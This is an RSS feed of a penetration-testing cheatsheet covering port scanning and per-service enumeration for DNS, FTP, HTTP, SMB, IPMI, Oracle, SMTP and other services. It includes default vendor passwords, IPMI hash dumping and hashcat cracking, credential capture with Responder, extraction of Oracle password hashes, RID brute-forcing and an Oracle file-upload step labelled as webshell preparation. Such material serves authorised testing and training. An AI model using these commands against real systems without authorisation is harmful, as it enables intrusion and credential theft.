<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>4 - Vuln Analysis :: Cyber Cheatsheet</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/index.html</link><description>0) Scanning Ports: https://www.stationx.net/common-ports-cheat-sheet/ https://web.archive.org/web/20240315102711/https://packetlife.net/media/library/23/common-ports.pdf https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/ OS Identification via: TTL: https://subinsb.com/default-device-ttl-values/ Host Discovery &amp; ARP See more about… Host Discovery &amp; ARP Source: Docs > 2 - Pre-Engagement > checklist#host-discovery--arp
Host Discovery &amp; ARP 1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning) 2. Interface &amp; Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope) 3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers) 4. Active Host Discovery (Run nmap -sn &lt;CIDR> or netdiscover to sweep the subnet via ARP/ICMP) 5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations) # -p: source port # TCP nc -nvzw5 &lt;TARGET> &lt;PORT> # UDP nc -unvzw5 &lt;TARGET> &lt;PORT> # Connect to Encrypted Service (TLS/SSL) openssl s_client -starttls ftp -connect &lt;TARGET>:&lt;PORT> # Banner Grabbing sudo nmap -n -Pn --script banner.nse &lt;TARGET> Ping Sweeps NOTE: sometimes ARP caches are delayed or not built… so running a ping sweep 2x is helpful</description><generator>Hugo</generator><language>en</language><atom:link href="https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/index.xml" rel="self" type="application/rss+xml"/><item><title>0) Scanning</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/scanning/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/scanning/index.html</guid><description>Ports: https://www.stationx.net/common-ports-cheat-sheet/ https://web.archive.org/web/20240315102711/https://packetlife.net/media/library/23/common-ports.pdf https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/ OS Identification via: TTL: https://subinsb.com/default-device-ttl-values/ Host Discovery &amp; ARP See more about… Host Discovery &amp; ARP Source: Docs > 2 - Pre-Engagement > checklist#host-discovery--arp
Host Discovery &amp; ARP 1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning) 2. Interface &amp; Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope) 3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers) 4. Active Host Discovery (Run nmap -sn &lt;CIDR> or netdiscover to sweep the subnet via ARP/ICMP) 5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations) # -p: source port # TCP nc -nvzw5 &lt;TARGET> &lt;PORT> # UDP nc -unvzw5 &lt;TARGET> &lt;PORT> # Connect to Encrypted Service (TLS/SSL) openssl s_client -starttls ftp -connect &lt;TARGET>:&lt;PORT> # Banner Grabbing sudo nmap -n -Pn --script banner.nse &lt;TARGET> Ping Sweeps NOTE: sometimes ARP caches are delayed or not built… so running a ping sweep 2x is helpful</description></item><item><title>Common Web Applications</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/common-web-applications/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/common-web-applications/index.html</guid><description>The following sections will detail how to enumerate various web applications, which could lead to exploitation and access.
EyeWitness For quick web application discovery.
# https://github.com/RedSiege/EyeWitness git clone https://github.com/RedSiege/EyeWitness.git &amp;&amp; cd EyeWitness/setup # cmake is already a part of build-essential sed -i 's/cmake//gI' ./setup.sh sudo ./setup.sh cd .. source eyewitness-venv/bin/activate # SCAN using nmap XML results output mkdir ../scan_eyewitness python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness WordPress WPScan: https://github.com/wpscanteam/wpscan API for Vuln DB (free use requires token): https://wpscan.com/api/ WPScan is great, but manual enumeration can also uncover more information sometimes (e.g. certain plugins)</description></item><item><title>DNS</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/dns/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/dns/index.html</guid><description>UDP 53: normal name queries TCP 53: zone transfers and syncs Server Config (Bind9) /etc/bind/named.conf.local /etc/bind/named.conf.options /etc/bind/named.conf.log https://wiki.debian.org/BIND9 https://web.archive.org/web/20250329174745/https://securitytrails.com/blog/most-popular-types-dns-attacks Domain Takeover: https://github.com/EdOverflow/can-i-take-over-xyz See more about… DNS Source: Docs > 2 - Pre-Engagement > checklist#dns
DNS 1. Server Recon &amp; Zone Transfer (Identify Nameservers, Bind version, and attempt dig axfr or dig any for a full dump) 2. Record Enumeration (Query standard types A, MX, TXT, SRV, and run Reverse DNS/PTR against IP ranges) 3. Subdomain Discovery (Combine passive cert transparency logs via crt.sh with active bruteforcing via gobuster/puredns) 4. Vulnerability Analysis (Check for dangling CNAMEs for Domain Takeover, and monitor LLMNR/NBT-NS if internal) Dangerous Settings Option Description allow-query Defines which hosts are allowed to send requests to the DNS server. allow-recursion Defines which hosts are allowed to send recursive requests to the DNS server. allow-transfer Defines which hosts are allowed to receive zone transfers from the DNS server. zone-statistics Collects statistical data of zones. # Add subdomains or vHosts echo '&lt;IP_ADDR> &lt;DOMAIN>' | sudo tee -a /etc/hosts # Registrar Info whois &lt;DOMAIN> | tee whois.txt # Query Nameserver for domain dig @&lt;DNS_SERVER> ns &lt;DOMAIN> # PTR Record or Reverse DNS Query dig @&lt;DNS_SERVER> -x &lt;IP_ADDRESS> # OLD: version / all records / zone transfer dig @&lt;DNS_SERVER> CH TXT version.bind &lt;DOMAIN> dig @&lt;DNS_SERVER> ANY &lt;DOMAIN> dig @&lt;DNS_SERVER> AXFR &lt;DOMAIN> # --- Record Types --- # ANY: return all records -- sometimes doesn't work! 
# A: IPv4 address # AAAA: IPv6 address # CNAME: Canonical Name # MX: Mail Servers # NS: Name Servers # PTR: Pointer Record # SOA: Start of Authority # TXT: Text Records # SRV: Service Records # CAA: Certification Authority Authorization for type in A AAAA CNAME MX NS SOA SRV TXT CAA; do echo -e "\n--- $type ---"; dig @&lt;DNS_SERVER> +short $type &lt;DOMAIN>; done # PASSIVE: subdomain enum # NOTE: requires API keys subfinder -v -d &lt;DOMAIN> # ACTIVE: subdomain enum (quick, external) puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt &lt;DOMAIN> # ACTIVE: subdomain enum (slower, internal) # /usr/share/SecLists/Discovery/DNS/namelist.txt gobuster dns --threads 64 --output gobuster_dns_top110000 --quiet -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --resolver &lt;DNS_SERVER> --domain &lt;DOMAIN> 🌐 Subdomains Certificate Transparency: https://crt.sh/ https://domain.glass/ (PAID) https://buckets.grayhatwarfare.com/ # Domain => Subdomains via Cert Registry curl -s "https://crt.sh/?q=&lt;DOMAIN>&amp;output=json" | jq . 
| grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt # Full Info for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done # (IPv4) Domain Name => IP Address for i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done # (IPv4) Addresses Only for i in $(cat domain_ipaddress.txt) ; do host $i | grep "has address" | cut -d" " -f4 | tee -a ip-addresses.txt ; done # (IPv4) Addresses => Services via Shodan for i in $(cat ip-addresses.txt) ; do shodan host $i ; done # DNS: old technique dig any &lt;DOMAIN> # Content Search: google.com Dork inurl:&lt;DOMAIN> intext:&lt;TERM> LLMNR &amp; NBT-NS UDP 5355: LLMNR (modern) UDP 137: NBT-NS (ancient) Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that are used as failover protocols when DNS is unavailable.</description></item><item><title>FTP</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ftp/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ftp/index.html</guid><description>TCP 20: data transfer
Active: Client->Server Passive: Server->Client TCP 21: control channel
Server Config: /etc/vsftpd.conf
http://vsftpd.beasts.org/vsftpd_conf.html DISALLOWED FTP users: /etc/ftpusers
Commands: https://web.archive.org/web/20230326204635/https://www.smartfile.com/blog/the-ultimate-ftp-commands-list/
Server Return Codes: https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes
TFTP has no auth and uses only UDP.
Dangerous Settings Setting Description anonymous_enable=YES Allowing anonymous login? anon_upload_enable=YES Allowing anonymous to upload files? anon_mkdir_write_enable=YES Allowing anonymous to create new directories? no_anon_password=YES Do not ask anonymous for password? anon_root=/home/username/ftp Directory for anonymous. write_enable=YES Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? # Connect to FTP server in passive mode with anonymous login ftp -p ftp://&lt;USER>:&lt;PASS>@&lt;TARGET> passive # lftp equivalents lftp ftp://&lt;USER>:&lt;PASS>@&lt;TARGET> set ftp:passive-mode off # Execute local commands (outside of session) !&lt;COMMAND> # List files and directories ls -la ls -laR # Read file get &lt;FILENAME> - # Download file get &lt;FILENAME> # Upload file put &lt;FILENAME> # Download all files mirror . # Download ALL files mkdir ftp_files &amp;&amp; cd ftp_files wget -m --no-passive-ftp ftp://anonymous:anonymous@&lt;TARGET></description></item><item><title>HTTP</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/http/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/http/index.html</guid><description>TCP 80: HTTP unencrypted TCP 443: HTTPS encrypted PORT (Web is oftentimes on other ports, especially internal proxies or admin pages on 8080 or 8433) See more about… Web Source: Docs > 2 - Pre-Engagement > checklist#web
Web 1. Technology &amp; Security Fingerprinting (Use whatweb and nikto to identify the server, frameworks, and WAF, and curl to inspect headers and robots.txt) 2. Content &amp; vHost Discovery (Run feroxbuster or gobuster dir to bruteforce directories/files, and gobuster vhost to find hidden virtual hosts) 3. Automated Vulnerability Scanning (Use nikto or wapiti to scan for common misconfigurations and known vulnerabilities like outdated software) 4. Manual Application Testing (OWASP Top 10) (After automated scans, manually inspect the application for logical flaws, focusing on Injection, Broken Access Control, and XSS) OWASP Top 10: https://owasp.org/www-project-top-ten/ HTTP Codes: https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#Standard_codes Web Page Scanner: https://github.com/RedSiege/EyeWitness /.well-known/ URIs: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml User-Agent: https://useragents.io/explore Default Web Roots: Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt Windows: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt # HTTP Headers + robots.txt curl -skLI -o curl_http_headers.txt http://&lt;TARGET> curl -skL -o curl_robots.txt http://&lt;TARGET>/robots.txt --- # Checks for WAF (web app firewall) wafw00f &lt;TARGET> # Enum web server + version + OS + frameworks + libraries whatweb --aggression 3 http://&lt;TARGET> --log-brief=whatweb_scan.txt # Fingerprint web server nikto -o nikto_fingerprint_scan.txt -Tuning b -h http://&lt;TARGET> # Enum web server vulns nikto -o nikto_vuln_scan.txt -h http://&lt;TARGET> # Enum web app logic &amp; vulns wapiti -f txt -o wapiti_scan.txt --url http://&lt;TARGET> # Webpage Crawler pip3 install --break-system-packages scrapy wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip &amp;&amp; unzip ReconSpider.zip 
python3 ReconSpider.py &lt;URL> &amp;&amp; cat results.json # !!! CHECK "results.json" !!! See more about… vHost Brute-Force Source: Docs > 9 - Notes > ffuf#vhost-brute-force</description></item><item><title>IMAP/POP3</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/imap-pop3/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/imap-pop3/index.html</guid><description>TCP 143/993: IMAP unc/enc TCP 110/995: POP3 unc/enc Dangerous Settings Setting Description auth_debug Enables all authentication debug logging. auth_debug_passwords This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. auth_verbose Logs unsuccessful authentication attempts and their reasons. auth_verbose_passwords Passwords used for authentication are logged and can also be truncated. auth_anonymous_username This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. 
# Enumerate sudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 &lt;TARGET> ### Non-Interactive # IMAPS curl -vkL --user '&lt;USER>':'&lt;PASSWORD>' 'imaps://&lt;TARGET>' -X &lt;COMMAND> # POP3S curl -vkL --user '&lt;USER>':'&lt;PASSWORD>' 'pop3s://&lt;TARGET>' -X &lt;COMMAND> ### Interactive # IMAPS openssl s_client -connect &lt;TARGET>:imaps 1 LOGIN &lt;USERNAME> &lt;PASSWORD> 1 LIST "" *	# Lists all directories 1 SELECT "&lt;MAILBOX>" # Selects a mailbox 1 UNSELECT "&lt;MAILBOX>" # Exits the selected mailbox 1 FETCH &lt;ID> all # Metadata of email 1 FETCH 1:* (BODY[]) # Show all emails 1 CREATE "INBOX" # Creates a mailbox with a specified name 1 DELETE "INBOX" # Deletes a mailbox 1 RENAME "ToRead" "Important" #	Renames a mailbox 1 LSUB "" *	# Returns a subset of names from the set of names that the User has declared as being active or subscribed 1 CLOSE	# Removes all messages with the Deleted flag set 1 LOGOUT # Closes the connection # POP3s openssl s_client -connect &lt;TARGET>:pop3s USER &lt;USERNAME> PASS &lt;PASSWORD> STAT	# List num of saved emails from the server. LIST	# List number and size of all emails. RETR &lt;ID>	# Deliver the requested email by ID. DELE &lt;ID> # Delete the requested email by ID. CAPA	# Display the server capabilities. RSET	# Reset the transmitted information. QUIT	# Close connection</description></item><item><title>IPMI</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ipmi/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ipmi/index.html</guid><description>UDP 623: normal Default Passwords: Dell iDRAC:	root:calvin HP iLO: Administrator:[randomized 8-character string consisting of numbers and uppercase letters] Supermicro IPMI: ADMIN:ADMIN A hardware control protocol that gives “virtual” physical access to a machine.
Dangerous Settings Server sends the salted hash of the user’s password to the user before authentication ### Enumeration via nmap sudo nmap -sU -p623 --script ipmi-version ### Metasploit Scanner setg RHOSTS &lt;TARGET> # https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version/ use auxiliary/scanner/ipmi/ipmi_version run # https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/ use auxiliary/scanner/ipmi/ipmi_dumphashes run ### Crack HP iLO format # https://hashcat.net/wiki/doku.php?id=example_hashes hashcat -m 7300 ipmi_hash.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u hashcat -m 7300 -w 3 -O "&lt;HASH>" /usr/share/wordlists/rockyou.txt</description></item><item><title>MySQL</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/mysql/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/mysql/index.html</guid><description>TCP 3306: normal Server Config: /etc/mysql/mysql.conf.d/mysqld.cnf default system schemas/databases: mysql - is the system database that contains tables that store information required by the MySQL server information_schema - provides access to database metadata performance_schema - is a feature for monitoring MySQL Server execution at a low level sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema secure_file_priv may be set as follows: If empty, the variable has no effect, which is not a secure setting. If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it. 
If set to NULL, the server disables import and export operations System Schema: https://dev.mysql.com/doc/refman/8.0/en/system-schema.html#:~:text=The%20mysql%20schema%20is%20the,used%20for%20other%20operational%20purposes Logical Operators: https://mariadb.com/docs/server/reference/sql-structure/operators/operator-precedence Cheatsheet: https://devhints.io/mysql Database > Schema > Table > Column > Value</description></item><item><title>NFS</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/nfs/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/nfs/index.html</guid><description>Similar to SMB.
TCP/UDP 111: NFSv2/v3 and various dynamic ports using rpcbind and portmapper TCP 2049: NFSv4 Server Config: /etc/exports https://manpages.ubuntu.com/manpages/trusty/man5/exports.5.html Dangerous Options Dangerous Option Description rw Read and write permissions. insecure Ports above 1024 will be used. nohide If another file system was mounted below an exported directory, this directory is exported by its own exports entry. no_root_squash All files created by root are kept with the UID/GID 0. # Show shared dirs df exportfs -sv # Show NFS Shares on server showmount -e &lt;TARGET> # Mount NFS mkdir target-NFS sudo mount -t nfs -o nolock &lt;TARGET>:/ ./target-NFS sudo umount ./target-NFS # Enumerate sudo nmap -n -Pn -p111,2049 -sV -sC &lt;TARGET> sudo nmap -n -Pn -p111,2049 -sV --script 'nfs*' &lt;TARGET></description></item><item><title>Nix: R-services</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/r-services/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/r-services/index.html</guid><description>TCP 512/513/514: rexecd, rlogind, rshd UDP 513: rwhod https://en.wikipedia.org/wiki/Berkeley_r-commands Server Config /etc/hosts.equiv: allowed hosts for rlogin ~/{.rlogin, .rhosts}: allowed hosts Suite of obsolete remote management tools. All communication is unencrypted including its authentication.
# Enum via nmap sudo nmap -sV -p 512,513,514 &lt;TARGET> # Remote copy; does not confirm remote overwriting of files rcp # Remote shell rsh # Remote command rexec # Remote login (telnet-like) rlogin &lt;TARGET> -l &lt;USER> # Show authenticated users rwho rusers -al &lt;TARGET></description></item><item><title>Nix: Rsync</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/rsync/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/rsync/index.html</guid><description>TCP 873: normal Pentesting: https://archive.ph/flPtZ Rsync via ssh: https://phoenixnap.com/kb/how-to-rsync-over-ssh # Enum via nmap sudo nmap -sV -p873 &lt;TARGET> # Enum dir rsync -av --list-only rsync://&lt;TARGET>/&lt;DIR> # Download dir optionally via SSH rsync -av -e "ssh -p &lt;SSH_PORT>" rsync://&lt;TARGET>/&lt;DIR></description></item><item><title>Nix: SSH</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ssh/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/ssh/index.html</guid><description>TCP 22: normal Server Config: /etc/ssh/sshd_config https://www.ssh.com/academy/ssh/sshd_config Versions: v1: obsolete and vuln to MITM v2: modern Dangerous Settings https://www.ssh-audit.com/hardening_guides.html Setting Description PasswordAuthentication yes Allows password-based authentication. PermitEmptyPasswords yes Allows the use of empty passwords. PermitRootLogin yes Allows logging in as the root user. Protocol 1 Uses an outdated version of encryption. X11Forwarding yes Allows X11 forwarding for GUI applications. AllowTcpForwarding yes Allows forwarding of TCP ports. PermitTunnel Allows tunneling. DebianBanner yes Displays a specific banner when logging in. 
# Audit security of SSH server # https://github.com/jtesta/ssh-audit git clone https://github.com/jtesta/ssh-audit.git &amp;&amp; cd ssh-audit ./ssh-audit.py -l warn &lt;TARGET> | tee ssh_audit.txt # Specify auth-method: password ssh -v -o PreferredAuthentications=password &lt;USER>@&lt;TARGET> sshpass -p '&lt;PASSWORD>' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 &lt;USER>@&lt;TARGET> # Force auth-method: privkey ssh -i &lt;PRIVATE_KEY> &lt;USER>@&lt;TARGET></description></item><item><title>Oracle TNS</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/oracle-tns/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/oracle-tns/index.html</guid><description>TCP 1521: normal Server Config: $ORACLE_HOME/network/admin/tnsnames.ora: names to addrs $ORACLE_HOME/network/admin/listener.ora: listener behavior $ORACLE_HOME/sqldeveloper: DB protection blacklist Default Password: DBSNMP/dbsnmp https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985 Oracle’s version of SQL.
# SID Brute-forcing via nmap sudo nmap -p1521 -sV --script oracle-sid-brute &lt;TARGET> ### ODAT # TNS Setup for Enumeration wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip sudo mkdir -p /opt/oracle sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH source ~/.bashrc cd ~ git clone https://github.com/quentinhardy/odat.git cd odat/ pip install --break-system-packages python-libnmap git submodule init git submodule update pip3 install --break-system-packages cx_Oracle sudo apt install -y python3-scapy sudo pip3 install --root-user-action colorlog termcolor passlib python-libnmap sudo apt install -y build-essential libgmp-dev pip3 install --break-system-packages pycryptodome # Enumeration odat.py all -d &lt;SID> -s &lt;TARGET> ### Connect # Install: https://askubuntu.com/a/207145 sqlplus &lt;USER>/&lt;PASSWORD>@&lt;TARGET>/&lt;SID> sqlplus &lt;USER>/&lt;PASSWORD>@&lt;TARGET>/&lt;SID> as sysdba # https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared # If you come across the following error sqlplus: # error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf" ; sudo ldconfig # SQL Commands select table_name from all_tables ; select * from user_role_privs ; select name, password from sys.user$ ; ### Upload webshell (if webserver) # Linux	/var/www/html # Windows	C:\inetpub\wwwroot echo "Oracle File Upload Test" > testing.txt odat.py utlfile -d &lt;SID> -U 
&lt;USER> -P &lt;PASSWORD> -s &lt;TARGET> --sysdba --putFile &lt;UPLOAD_DIR> testing.txt ./testing curl -Lo- http://&lt;TARGET>/testing.txt</description></item><item><title>SMB/CIFS/RPC</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/smb-cifs-rpc/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/smb-cifs-rpc/index.html</guid><description>TCP 135: RPC Endpoint Mapper (EPM) UDP 137, UDP 138, TCP 139: legacy (CIFS/SMB1) TCP 445: RPC/(SMB2/3) Shares: C$ (drive) ADMIN$ (Windows drive) IPC$ (RPC) PRINT$ See more about… SMB Source: Docs > 2 - Pre-Engagement > checklist#smb
SMB 1. Anonymous Access &amp; Share Listing (Attempt a null session via smbclient -L &lt;IP> -N or crackmapexec smb &lt;IP> --shares to list shares without credentials) 2. Comprehensive Enumeration (Run enum4linux-ng -A &lt;IP> to automatically dump users, groups, OS info, and password policies) 3. Share Content Inspection (Mount accessible shares or use smbclient to browse directories for sensitive files, scripts, or backups) 4. Security Posture Check (Use nmap --script=smb-security-mode to verify if SMB signing is required, which is critical for preventing relay attacks) Dangerous Settings Setting Description browseable = yes Allow listing available shares in the current share? read only = no Forbid the creation and modification of files? writable = yes Allow users to create and modify files? guest ok = yes Allow connecting to the service without using a password? enable privileges = yes Honor privileges assigned to specific SID? create mask = 0777 What permissions must be assigned to the newly created files? directory mask = 0777 What permissions must be assigned to the newly created directories? logon script = script.sh What script needs to be executed on the user’s login? magic script = script.sh Which script should be executed when the script gets closed? magic output = script.out Where the output of the magic script needs to be stored? 
https://hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html # ANON: List available SMB shares smbclient -U "" -N --list //&lt;TARGET>/ smbclient -U "guest" -N --list //&lt;TARGET>/ # ANON: Connect to an SMB share smbclient -U "" -N //&lt;TARGET>/&lt;SHARE> smbclient -U "guest" -N //&lt;TARGET>/&lt;SHARE> # Connect to SMB share smbclient --user=&lt;DOMAIN>/&lt;USERNAME> --password='&lt;PASSWORD>' //&lt;TARGET>/&lt;SHARE> ls # List files more # read file get &lt;FILE> # Download file recurse # Toggle directory recursion # Download recursion recurse on prompt off mget * # Execute local commands (outside of session) !&lt;COMMAND> --- # https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol # badPwdCount: https://learn.microsoft.com/en-us/windows/win32/adschema/a-badpwdcount nxc smb &lt;TARGET> -u '' -p '' --users --groups --shares --pass-pol # User and Groups netexec smb &lt;TARGET> -u "&lt;USERNAME>" -p "&lt;PASSWORD>" --users netexec smb &lt;TARGET> -u "&lt;USERNAME>" -p "&lt;PASSWORD>" --groups # List shares netexec smb &lt;TARGET> -u "&lt;USERNAME>" -p "&lt;PASSWORD>" --shares # Recursively list files smbmap -r --depth 3 -r &lt;SHARE> -u &lt;USERNAME> -p &lt;PASSWORD> -H &lt;IP> # Directories only smbmap -R &lt;SHARE> -d &lt;DOMAIN> -u &lt;USERNAME> -p &lt;PASSWORD> -H &lt;IP> --dir-only --- # https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf # https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html # RPC rpcclient -U '&lt;USER>%&lt;PASSWORD>' &lt;TARGET> querydominfo	# Provides domain, server, and user info enumdomusers # Enumerates all domain users srvinfo	# Server information enumdomains	# Enumerate all domains netshareenumall	# Enumerates available shares netsharegetinfo &lt;SHARE>	# Info about a specific share queryuser &lt;RID> # User info --- # TODO: move these to a more appropriate/relevant section # Brute-Forcing RIDs via RPC for i in $(seq 500 1100);do rpcclient -N -U "" &lt;TARGET> -c 
"queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" &amp;&amp; echo "";done # Same with other tools samrdump.py &lt;TARGET> smbmap -H &lt;TARGET> enum4linux-ng enum4linux-ng uses various protocols for enumeration that are outside of the scope here, but for knowledge of the services:</description></item><item><title>SMTP/ESMTP</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/smtp-esmtp/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/smtp-esmtp/index.html</guid><description>TCP 25: unencrypted TCP 465/587/2525: encrypted Security: DKIM: https://dkim.org/ Sender Policy Framework (SPF): https://dmarcian.com/what-is-spf/ DMARC: https://dmarc.org/ https://serversmtp.com/smtp-error/ Dangerous Settings Option Description mynetworks = 0.0.0.0/0 With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it. https://hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#basic-actions # CAREFUL! 
Open relay check sudo nmap -p25,465,587,2525 --script smtp-open-relay &lt;TARGET> # User enum # https://github.com/cytopia/smtp-user-enum#how-does-vrfy-work # TRY: -M VRFY wget https://raw.githubusercontent.com/cytopia/smtp-user-enum/refs/heads/master/smtp-user-enum python3 ./smtp-user-enum --mode VRFY --file /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --domain &lt;DOMAIN> &lt;TARGET> 25 # Manual enumeration telnet &lt;TARGET> 25 EHLO &lt;HOSTNAME> VRFY &lt;USER> # 250 success; 252 maybe/not; 550 failure EXPN</description></item><item><title>SNMP</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/snmp/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/snmp/index.html</guid><description>UDP 161: normal UDP 162: “trap” or alert OIDs: https://www.alvestrand.no/objectid/top.html Versions: v1/v2c: unencrypted v3: encryption via PSK /etc/snmp/snmpd.conf https://www.net-snmp.org/docs/man/snmpd.conf.html Management Information Base (MIB) is a text file of Object Identifier (OID) s, which provide addresses to access device info, in the Abstract Syntax Notation One (ASN.1) based ASCII text format. Community Strings are sort of “passwords” to manage the access level.
